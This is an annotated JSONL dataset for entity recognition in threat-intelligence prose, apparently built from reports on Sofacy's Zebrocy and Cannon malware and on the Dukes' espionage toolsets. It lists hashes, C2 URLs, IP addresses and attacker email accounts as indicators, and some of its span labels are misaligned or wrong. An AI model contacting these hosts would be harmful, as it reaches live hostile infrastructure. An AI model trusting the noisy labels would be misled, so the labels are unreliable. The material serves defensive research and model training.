{"text": "Cannon acknowledges the successful execution by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok5 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 64, "label": "System"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Indicator"}, {"start": 226, "end": 231, "label": "Indicator"}]}
{"text": "The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 126, "end": 133, "label": "Malware"}]}
{"text": "In these attacks , the delivery documents used to install Zebrocy used remote templates , which increases the difficulty to analyze the attack as an active C2 server is needed to obtain the macro-enabled document .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 156, "end": 158, "label": "System"}]}
{"text": "The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks , which continues to show a willingness to use current events in their social engineering themes .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]}
{"text": "Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 102, "end": 108, "label": "Malware"}, {"start": 116, "end": 122, "label": "Malware"}]}
{"text": "Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 17, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Indicator"}, {"start": 35, "end": 37, "label": "System"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 101, "end": 105, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Indicator"}, {"start": 121, "end": 123, "label": "System"}]}
{"text": "This is not a new tactic but may be more effective at evading detection as the external hosts involved are a legitimate email service provider .", "spans": [{"start": 120, "end": 125, "label": "System"}]}
{"text": "Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block While Sofacy \u2019s campaign delivering Zebrocy and Cannon remains active , Palo Alto Networks customers are protected from this threat in the following ways :", "spans": [{"start": 37, "end": 42, "label": "Indicator"}, {"start": 47, "end": 52, "label": "Indicator"}, {"start": 137, "end": 139, "label": "System"}, {"start": 163, "end": 169, "label": "Organization"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}, {"start": 229, "end": 247, "label": "Organization"}]}
{"text": "AutoFocus customers can track these samples with the Zebrocy and Cannon WildFire detects the delivery documents , Zebrocy and Cannon payloads discussed in this blog with malicious verdicts .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 65, "end": 71, "label": "Malware"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 114, "end": 121, "label": "Malware"}, {"start": 126, "end": 132, "label": "Malware"}]}
{"text": "Traps blocks the macro-ladened remote templates as Suspicious macro detected , as well as Zebrocy and Cannon payloads as Suspicious executable detected .", "spans": [{"start": 62, "end": 67, "label": "System"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]}
{"text": "The IP addresses hosting remote templates and C2 services in these attacks are classified as Command and Control .", "spans": [{"start": 46, "end": 48, "label": "System"}, {"start": 93, "end": 112, "label": "System"}]}
{"text": "Delivery Hashes :", "spans": []}
{"text": "2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}]}
{"text": "Remote Template Hashes :", "spans": [{"start": 0, "end": 15, "label": "System"}]}
{"text": "f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}]}
{"text": "Remote Templates :", "spans": [{"start": 0, "end": 16, "label": "System"}]}
{"text": "http://188.241.58.170/live/owa/office.dotm .", "spans": [{"start": 0, "end": 42, "label": "Indicator"}]}
{"text": "Zebrocy Hashes :", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "Zebrocy C2 URLs :", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 10, "label": "System"}]}
{"text": "http://188.241.58.170/local/s3/filters.php https://200.122.181.25/catalog/products/books.php .", "spans": [{"start": 0, "end": 42, "label": "Indicator"}, {"start": 43, "end": 92, "label": "Indicator"}]}
{"text": "Cannon Hashes :", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "Cannon email Accounts :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 12, "label": "System"}]}
{"text": "sahro.bella7@post.cz trala.cosh2@post.cz bishtr.cam47@post.cz lobrek.chizh@post.cz cervot.woprov@post.cz .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 41, "end": 61, "label": "Indicator"}, {"start": 62, "end": 82, "label": "Indicator"}, {"start": 83, "end": 104, "label": "Indicator"}]}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "The Dukes primarily target Western governments and related organizations , such as government ministries and agencies , political think tanks , and governmental subcontractors .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "Their targets have also included the governments of members of the Commonwealth of Independent States ; Asian , African , and Middle Eastern governments ; organizations associated with Chechen extremism ; and Russian speakers engaged in the illicit trade of controlled substances and drugs .", "spans": [{"start": 67, "end": 101, "label": "Organization"}]}
{"text": "The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 88, "end": 96, "label": "Malware"}, {"start": 99, "end": 109, "label": "Malware"}, {"start": 112, "end": 121, "label": "Malware"}, {"start": 124, "end": 132, "label": "Malware"}, {"start": 135, "end": 144, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 157, "end": 167, "label": "Malware"}, {"start": 170, "end": 179, "label": "Malware"}, {"start": 186, "end": 196, "label": "Malware"}]}
{"text": "In recent years , the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations .", "spans": [{"start": 22, "end": 27, "label": "Organization"}]}
{"text": "The earliest activity we have been able to definitively attribute to the Dukes are two PinchDuke campaigns from November 2008 .", "spans": [{"start": 73, "end": 78, "label": "Organization"}, {"start": 87, "end": 96, "label": "Malware"}]}
{"text": "These campaigns use PinchDuke samples that were , according to their compilation timestamps , created on the 5th and 12th of November 2008 .", "spans": [{"start": 20, "end": 29, "label": "Malware"}]}
{"text": "The campaign identifiers found in these two samples are respectively , \u201c alkavkaz.com20081105 \u201d and \u201c cihaderi.net20081112 \u201d .", "spans": []}
{"text": "The first campaign identifier , found in the sample compiled on the 5th , references alkavkaz.com , a domain associated with a Turkish website proclaiming to be the \u201c Chechan [sic] Informational Center \u201d .", "spans": [{"start": 85, "end": 97, "label": "Indicator"}]}
{"text": "The second campaign identifier , from the sample compiled on the 12th , references cihaderi.net , another Turkish website that claims to provide \u201c news from the jihad world \u201d and which dedicates a section of its site to Chechnya .", "spans": [{"start": 83, "end": 95, "label": "Indicator"}]}
{"text": "Due to a lack of other PinchDuke samples from 2008 or earlier , we are unable to estimate when the Duke operation originally began .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 99, "end": 103, "label": "Organization"}]}
{"text": "Based on our technical analysis of the known PinchDuke samples from 2008 however , we believe PinchDuke to have been under development by the summer of 2008 .", "spans": [{"start": 45, "end": 54, "label": "Malware"}, {"start": 94, "end": 103, "label": "Malware"}]}
{"text": "In fact , we believe that by the autumn of 2008 , the Dukes were already developing not one but at least two distinct malware toolsets .", "spans": []}
{"text": "This assertion is based on the oldest currently known sample of another Duke related toolset , GeminiDuke , which was compiled on the 26th of January 2009 .", "spans": [{"start": 72, "end": 76, "label": "Organization"}, {"start": 95, "end": 105, "label": "Malware"}]}
{"text": "This sample , like the early PinchDuke samples , appears to already be a \u201c fully-grown \u201d sample , which is why we believe GeminiDuke was under development by the autumn of 2008 .", "spans": [{"start": 29, "end": 38, "label": "Malware"}, {"start": 122, "end": 132, "label": "Malware"}]}
{"text": "That the Dukes were already developing and operating at least two distinct malware toolsets by the second half of 2008 suggests to us that either the size of their cyberespionage operation was already large enough to warrant such an arsenal of tools , or that they expected their operation to grow significantly enough in the foreseeable future to warrant the development of such an arsenal .", "spans": [{"start": 9, "end": 14, "label": "Organization"}]}
{"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \u201c MiniDuke \u201d to identify the first Duke related malware they found .", "spans": [{"start": 19, "end": 23, "label": "Organization"}, {"start": 80, "end": 94, "label": "Organization"}, {"start": 113, "end": 121, "label": "Malware"}, {"start": 146, "end": 150, "label": "Organization"}]}
{"text": "As explained in their whitepaper , the researchers observed the surprisingly small MiniDuke backdoor being spread via the same exploit that was being used by a malware that they had already named ItaDuke ; the \u201c Duke \u201d part of this malware \u2019s name had in turn come about because it reminded the researchers of the notable Duqu threat .", "spans": [{"start": 83, "end": 100, "label": "Malware"}, {"start": 196, "end": 203, "label": "Malware"}, {"start": 212, "end": 216, "label": "Organization"}, {"start": 322, "end": 326, "label": "Malware"}]}
{"text": "Despite the shared history of the name itself however , it is important to note that there is no reason to believe that the Duke toolsets themselves are in any way related to the ItaDuke malware , or to Duqu for that matter .", "spans": [{"start": 124, "end": 128, "label": "Organization"}, {"start": 179, "end": 186, "label": "Malware"}, {"start": 203, "end": 207, "label": "Malware"}]}
{"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the new toolsets were also given \u201c Duke \u201d -derived names , and thus the threat actor operating the toolsets started to be commonly referred to as \u201c the Dukes \u201d .", "spans": [{"start": 119, "end": 127, "label": "Malware"}, {"start": 165, "end": 169, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}]}
{"text": "The only other publicly used name for the threat actor that we are aware of is \u201c APT29 \u201d .", "spans": [{"start": 81, "end": 86, "label": "Organization"}]}
{"text": "Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 167, "end": 186, "label": "Organization"}]}
{"text": "Campaign identifiers from 2009 also reveal that by that time , the Dukes were already actively interested in political matters related to the United States ( US ) and the North Atlantic Treaty Organization ( NATO ) , as they ran campaigns targeting ( among other organizations ) a US based foreign policy think tank , another set of campaigns related to a NATO exercise held in Europe , and a third set apparently targeting what was then known as the Georgian \u201c Information Centre on NATO \u201d .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 171, "end": 205, "label": "Organization"}, {"start": 208, "end": 212, "label": "Organization"}, {"start": 356, "end": 360, "label": "Organization"}, {"start": 484, "end": 488, "label": "Organization"}]}
{"text": "Of these campaigns , two clusters in particular stand out .", "spans": []}
{"text": "The first is a set of campaigns from the 16th and 17th of April , 2009 , that targeted a US based foreign policy think tank , as well as government institutions in Poland and the Czech Republic .", "spans": []}
{"text": "These campaigns utilized specially-crafted malicious Microsoft Word documents and PDF files , which were sent as e-mail attachments to various personnel in an attempt to infiltrate the targeted organizations .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 63, "end": 67, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 113, "end": 119, "label": "System"}]}
{"text": "We believe this cluster of campaigns had a joint goal of gathering intelligence on the sentiments of the targeted 5 countries with respect to the plans being discussed at the time for the US to locate their \u201c European Interceptor Site \u201d missile defense base in Poland , with a related radar station that was intended to be located in the Czech Republic .", "spans": []}
{"text": "Regarding the timing of these campaigns , it is curious to note that they began only 11 days after President Barack Obama gave a speech on the 5th of April declaring his intention to proceed with the deployment of these missile defenses .", "spans": []}
{"text": "The second notable cluster comprises of two campaigns that were possibly aimed at gathering information on Georgia S-LOC-NATO relations .", "spans": [{"start": 107, "end": 125, "label": "Organization"}]}
{"text": "The first of these runs used the campaign identifier \u201c natoinfo_ge \u201d , an apparent reference to the www.natoinfo.ge website belonging to a Georgian political body that has since been renamed \u201c Information Centre on NATO and EU \u201d .", "spans": [{"start": 100, "end": 115, "label": "Indicator"}, {"start": 215, "end": 219, "label": "Organization"}]}
{"text": "Although the campaign identifier itself doesn\u2019t contain a date , we believe the campaign to have originated around the 7th of June 2009 , which was when the PinchDuke sample in question was compiled .", "spans": [{"start": 157, "end": 166, "label": "Malware"}]}
{"text": "This belief is based on the observation that in all of the other PinchDuke samples we have analyzed , the date of the campaign identifier has been within a day of the compilation date .", "spans": [{"start": 65, "end": 74, "label": "Malware"}]}
{"text": "The second campaign identifier , which we suspect may be related , is \u201c mod_ge_2009_07_03 \u201d from a month later and apparently targeting the Ministry of Defense of Georgia .", "spans": [{"start": 140, "end": 159, "label": "Organization"}]}
{"text": "The spring of 2010 saw continued PinchDuke campaigns against Turkey and Georgia , but also numerous campaigns against other members of the Commonwealth of Independent States such as Kazakhstan , Kyrgyzstan , Azerbaijan and Uzbekistan .", "spans": [{"start": 33, "end": 42, "label": "Malware"}]}
{"text": "Of these , the campaign with the identifier \u201c kaz_2010_07_30 \u201d , which possibly targeted Kazakhstan , is of note because it is the last PinchDuke campaign we have observed .", "spans": [{"start": 136, "end": 145, "label": "Malware"}]}
{"text": "We believe that during the first half of 2010 , the Dukes slowly migrated from PinchDuke and started using a new infostealer malware toolset that we call CosmicDuke .", "spans": [{"start": 52, "end": 57, "label": "Organization"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 154, "end": 164, "label": "Malware"}]}
{"text": "The first known sample of the CosmicDuke toolset was compiled on the 16th of January 2010 .", "spans": [{"start": 30, "end": 40, "label": "Malware"}]}
{"text": "Back then , CosmicDuke still lacked most of the credential-stealing functionality found in later samples .", "spans": [{"start": 12, "end": 22, "label": "Malware"}]}
{"text": "We believe that during the spring of 2010 , the credential and file stealing capabilities of PinchDuke were slowly ported to CosmicDuke , effectively making PinchDuke obsolete .", "spans": [{"start": 93, "end": 102, "label": "Malware"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 157, "end": 166, "label": "Malware"}]}
{"text": "During this period of transition , CosmicDuke would often embed PinchDuke so that , upon execution , CosmicDuke would write to disk and execute PinchDuke .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 64, "end": 73, "label": "Malware"}, {"start": 101, "end": 111, "label": "Malware"}, {"start": 144, "end": 153, "label": "Malware"}]}
{"text": "Both PinchDuke and CosmicDuke would then operate independently on the same compromised host , including performing separate information gathering , data Exfiltration and communication with a command and control ( C&C ) server - although both malware would often use the same C&C server .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 19, "end": 29, "label": "Malware"}, {"start": 191, "end": 210, "label": "System"}, {"start": 213, "end": 216, "label": "System"}, {"start": 275, "end": 278, "label": "System"}]}
{"text": "We believe the purpose of this parallel use was to \u2018 fieldtest \u2019 the new CosmicDuke tool , while at the same time ensuring operational success with the tried-and-tested PinchDuke .", "spans": [{"start": 73, "end": 83, "label": "Malware"}, {"start": 169, "end": 178, "label": "Malware"}]}
{"text": "During this period of CosmicDuke testing and development , the Duke authors also started experimenting with the use of privilege escalation vulnerabilities .", "spans": [{"start": 22, "end": 32, "label": "Malware"}, {"start": 63, "end": 67, "label": "Organization"}]}
{"text": "Specifically , on the 19th of January 2010 security researcher Tavis Ormandy disclosed a local privilege escalation vulnerability ( CVE-2010-0232 ) affecting Microsoft Windows .", "spans": [{"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 168, "end": 175, "label": "System"}]}
{"text": "As part of the disclosure , Ormandy also included the source code for a proof-of- concept exploit for the vulnerability .", "spans": []}
{"text": "Just 7 days later , on the 26th of January , a component for CosmicDuke was compiled that exploited the vulnerability and allowed the tool to operate with higher privileges .", "spans": [{"start": 61, "end": 71, "label": "Malware"}]}
{"text": "During 2011 , the Dukes appear to have significantly expanded both their arsenal of malware toolsets and their C&C infrastructure .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 111, "end": 114, "label": "System"}]}
{"text": "While the Dukes employed both hacked websites and purposely rented servers for their C&C infrastructure , the group rarely registered their own domain names , preferring instead to connect to their self- operated servers via IP addresses .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 85, "end": 88, "label": "System"}]}
{"text": "The beginning of 2011 however saw a significant break from that routine , when a large grouping of domain names was registered by the Dukes in two batches ; the first batch was registered on the 29th of January and the second on the 13th of February .", "spans": [{"start": 134, "end": 139, "label": "Organization"}]}
{"text": "All the domains in both batches were initially registered with the same alias : \u201c John Kasai of Klagenfurt , Austria \u201d .", "spans": []}
{"text": "These domains were used by the Dukes in campaigns involving many of their different malware toolsets all the way until 2014 .", "spans": [{"start": 31, "end": 36, "label": "Organization"}]}
{"text": "Like the \u201c MiniDuke loader \u201d , these \u201c John Kasai \u201d domains also provide a common thread tying together much of the tools and infrastructure of the Dukes .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 148, "end": 153, "label": "Organization"}]}
{"text": "By 2011 , the Dukes had already developed at least 3 distinct malware toolsets , including a plethora of supporting components such as loaders and persistence modules .", "spans": [{"start": 14, "end": 19, "label": "Organization"}]}
{"text": "In fact , as a sign of their arsenal \u2019s breadth , they had already decided to retire one of these malware toolsets as obsolete after developing a replacement for it , seemingly from scratch .", "spans": []}
{"text": "The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 100, "end": 108, "label": "Malware"}, {"start": 113, "end": 121, "label": "Malware"}]}
{"text": "While all of the earlier toolsets \u2013 GeminiDuke , PinchDuke , and CosmicDuke \u2013 were designed around a core infostealer component , MiniDuke is centered on a simplistic backdoor component whose purpose is to enable the remote execution of commands on the compromised system .", "spans": [{"start": 36, "end": 46, "label": "Malware"}, {"start": 49, "end": 58, "label": "Malware"}, {"start": 65, "end": 75, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}]}
{"text": "The first observed samples of the MiniDuke backdoor component are from May 2011 .", "spans": [{"start": 34, "end": 51, "label": "Malware"}]}
{"text": "This backdoor component however is technically very closely related to GeminiDuke , to the extent that we believe them to share parts of their source code .", "spans": [{"start": 71, "end": 81, "label": "Malware"}]}
{"text": "The origins of MiniDuke can thus be traced back to the origins of GeminiDuke , of which the earliest observed sample was compiled in January of 2009 .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}]}
{"text": "Unlike the simplistic MiniDuke toolset , CozyDuke is a highly versatile , modular , malware \u201c platform \u201d whose functionality lies not in a single core component but in an array of modules that it may be instructed to download from its C&C server .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 235, "end": 238, "label": "System"}]}
{"text": "These modules are used to selectively provide CozyDuke with just the functionality deemed necessary for the mission at hand .", "spans": [{"start": 46, "end": 54, "label": "Malware"}]}
{"text": "CozyDuke \u2019s modular platform approach is a clear break from the designs of the previous Duke toolsets .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 88, "end": 92, "label": "Organization"}]}
{"text": "The stylistic differences between CozyDuke and its older siblings are further exemplified by the way it was coded .", "spans": [{"start": 34, "end": 42, "label": "Malware"}]}
{"text": "All of the 4 previously mentioned toolsets were written in a minimalistic style commonly seen with malware ; MiniDuke even goes as far as having many components written in Assembly language .", "spans": [{"start": 109, "end": 117, "label": "Malware"}]}
{"text": "CozyDuke however represents the complete opposite .", "spans": [{"start": 0, "end": 8, "label": "Malware"}]}
{"text": "Instead of being written in Assembly or C , it was written in C++ , which provides added layers of abstraction for the developer \u2019s perusal , at the cost of added complexity .", "spans": [{"start": 40, "end": 41, "label": "System"}, {"start": 62, "end": 65, "label": "System"}]}
{"text": "Contrary to what might be expected from malware , early CozyDuke versions also lacked any attempt at obfuscating or hiding their true nature .", "spans": [{"start": 56, "end": 64, "label": "Malware"}]}
{"text": "In fact , they were extremely open and verbose about their functionality - for example , early samples contained a plethora of logging messages in unencrypted form .", "spans": []}
{"text": "In comparison , even the earliest known GeminiDuke samples encrypted any strings that might have given away the malware \u2019s true nature .", "spans": [{"start": 40, "end": 50, "label": "Malware"}]}
{"text": "Finally , early CozyDuke versions also featured other elements that one would associate more with a traditional software development project than with malware .", "spans": [{"start": 16, "end": 24, "label": "Malware"}]}
{"text": "For instance , the earliest known CozyDuke version utilized a feature of the Microsoft Visual C++ compiler known as run-time error checking .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 77, "end": 86, "label": "Organization"}, {"start": 87, "end": 93, "label": "System"}, {"start": 94, "end": 97, "label": "System"}]}
{"text": "This feature added automatic error checking to critical parts of the program \u2019s execution at the cost , from a malware perspective , of providing additional hints that make the malware \u2019s functionality easier for reverse engineers to understand .", "spans": []}
{"text": "Based on these and other similar stylistic differences observed between CozyDuke and its older siblings , we speculate that while the older Duke families appear to be the work of someone with a background in malware writing ( or at the least in hacking ) , CozyDuke \u2019s author or authors more likely came from a software development background .", "spans": [{"start": 72, "end": 80, "label": "Malware"}, {"start": 140, "end": 144, "label": "Organization"}, {"start": 257, "end": 265, "label": "Malware"}]}
{"text": "We still know surprisingly few specifics about the Dukes group \u2019s activities during 2012 .", "spans": [{"start": 51, "end": 56, "label": "Organization"}]}
{"text": "Based on samples of Duke malware from 2012 , the Dukes do appear to have continued actively using and developing all of their tools .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 49, "end": 54, "label": "Organization"}]}
{"text": "Of these , CosmicDuke and MiniDuke appear to have been in more active use , while receiving only minor updates .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 26, "end": 34, "label": "Malware"}]}
{"text": "GeminiDuke and CozyDuke on the other hand appear to have been less used in actual operations , but did undergo much more significant development .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 15, "end": 23, "label": "Malware"}]}
{"text": "On the 12th of February 2013 , FireEye published a blogpost alerting readers to a combination of new Adobe Reader 0-day vulnerabilities , CVE-2013-0640 and CVE-2013-0641 , that were being actively exploited in the wild . 8 days after FireEye \u2019s initial alert , Kaspersky spotted the same exploit being used to spread an entirely different malware family from the one mentioned in the original report .", "spans": [{"start": 31, "end": 38, "label": "Organization"}, {"start": 101, "end": 113, "label": "System"}, {"start": 114, "end": 119, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}]}
{"text": "On 27th February , Kaspersky and CrySyS Lab published research on this previously unidentified malware family , dubbing it MiniDuke .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 33, "end": 43, "label": "Organization"}, {"start": 123, "end": 131, "label": "Malware"}]}
{"text": "As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 69, "end": 77, "label": "Malware"}]}
{"text": "Their malware had not stayed undetected for those 4 and a half years .", "spans": []}
{"text": "In fact , in 2009 a PinchDuke sample had been included in the malware set used by the AV-Test security product testing organization to perform anti-virus product comparison reviews .", "spans": [{"start": 20, "end": 29, "label": "Malware"}, {"start": 86, "end": 93, "label": "Organization"}]}
{"text": "Until 2013 however , earlier Duke toolsets had not been put in a proper context .", "spans": [{"start": 29, "end": 33, "label": "Organization"}]}
{"text": "That finally started to change in 2013 .", "spans": []}
{"text": "The MiniDuke samples that were spread using these exploits were compiled on the 20th of February , after the exploit was already publicly known .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]}
{"text": "One might argue that since this took place after the exploits were publicly mentioned , the Dukes simply copied them .", "spans": [{"start": 92, "end": 97, "label": "Organization"}]}
{"text": "We however do not believe so .", "spans": []}
{"text": "As mentioned by Kaspersky , even though the exploits used for these MiniDuke campaigns were near-identical to those described by FireEye , there were nevertheless small differences .", "spans": [{"start": 16, "end": 25, "label": "Organization"}, {"start": 68, "end": 76, "label": "Malware"}, {"start": 129, "end": 136, "label": "Organization"}]}
{"text": "Of these , the crucial one is the presence of PDB strings in the MiniDuke exploits .", "spans": [{"start": 46, "end": 49, "label": "System"}, {"start": 65, "end": 73, "label": "Malware"}]}
{"text": "These strings , which are generated by the compiler when using specific compilation settings , means that the components of the exploits used with MiniDuke had to have been compiled independently from those described by FireEye .", "spans": [{"start": 147, "end": 155, "label": "Malware"}, {"start": 220, "end": 227, "label": "Organization"}]}
{"text": "We do not know whether the Dukes compiled the components themselves or whether someone else compiled the components before handing them to the group .", "spans": [{"start": 27, "end": 32, "label": "Organization"}]}
{"text": "This does however still rule out the possibility that the Dukes simply obtained copies of the exploit binaries described by FireEye and repurposed them .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 124, "end": 131, "label": "Organization"}]}
{"text": "In our opinion , this insistence on using exploits that are already under heightened scrutiny suggests the existence of at least one of three circumstances .", "spans": []}
{"text": "Firstly , the Dukes may have been confident enough in their own abilities ( and in the slowness of their opponents to react to new threats ) that they did not care if their targets may already be on the lookout for anyone exploiting these vulnerabilities .", "spans": [{"start": 14, "end": 19, "label": "Organization"}]}
{"text": "Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 59, "end": 67, "label": "Malware"}]}
{"text": "Or thirdly , the Dukes may have invested so much into these campaigns that by the time FireEye published their alert , the Dukes felt they could not afford to halt the campaigns .", "spans": [{"start": 17, "end": 22, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}]}
{"text": "We believe all three circumstances to have coexisted at least to some extent .", "spans": []}
{"text": "As will become evident in this report , this was not a one-off case but a recurring theme with the Dukes , in that they would rather continue with their operations as planned than retreat from operating under the spotlight .", "spans": [{"start": 99, "end": 104, "label": "Organization"}]}
{"text": "As originally detailed in Kaspersky \u2019s whitepaper , the MiniDuke campaigns from February 2013 employed spear-phishing emails with malicious PDF file attachments .", "spans": [{"start": 26, "end": 35, "label": "Organization"}, {"start": 56, "end": 64, "label": "Malware"}, {"start": 118, "end": 124, "label": "System"}, {"start": 140, "end": 143, "label": "System"}]}
{"text": "These PDFs would attempt to silently infect the recipient with MiniDuke , while distracting them by displaying a decoy document .", "spans": [{"start": 6, "end": 10, "label": "System"}, {"start": 63, "end": 71, "label": "Malware"}]}
{"text": "The headings of these documents included \u201c Ukraine \u2019s NATO Membership Action Plan ( MAP ) Debates \u201d , \u201c The Informal Asia-Europe Meeting ( ASEM ) Seminar on Human Rights \u201d , and \u201c Ukraine \u2019s Search for a Regional Foreign Policy \u201d .", "spans": [{"start": 54, "end": 58, "label": "Organization"}]}
{"text": "The targets of these campaigns , according to Kaspersky , were located variously in Belgium , Hungary , Luxembourg and Spain .", "spans": [{"start": 46, "end": 55, "label": "Organization"}]}
{"text": "Kaspersky goes on to state that by obtaining log files from the MiniDuke command and control servers , they were able to identify high-profile victims from Ukraine , Belgium , Portugal , Romania , the Czech Republic , Ireland , the United States and Hungary .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 64, "end": 72, "label": "Malware"}, {"start": 73, "end": 92, "label": "System"}]}
{"text": "After the February campaigns , MiniDuke activity appeared to quiet down , although it did not fully stop , for the rest of 2013 .", "spans": [{"start": 31, "end": 39, "label": "Malware"}]}
{"text": "The Dukes group as a whole however showed no sign of slowing down .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "In fact , we saw yet another Duke malware toolset , OnionDuke , appear first in 2013 .", "spans": [{"start": 29, "end": 33, "label": "Organization"}, {"start": 52, "end": 61, "label": "Malware"}]}
{"text": "Like CozyDuke , OnionDuke appears to have been designed with versatility in mind , and takes a similarly modular platform approach .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 16, "end": 25, "label": "Malware"}]}
{"text": "The OnionDuke toolset includes various modules for purposes such as password stealing , information gathering , denial of service ( DoS ) attacks , and even posting spam to the Russian social media network , VKontakte .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 112, "end": 129, "label": "System"}, {"start": 132, "end": 135, "label": "System"}, {"start": 208, "end": 217, "label": "System"}]}
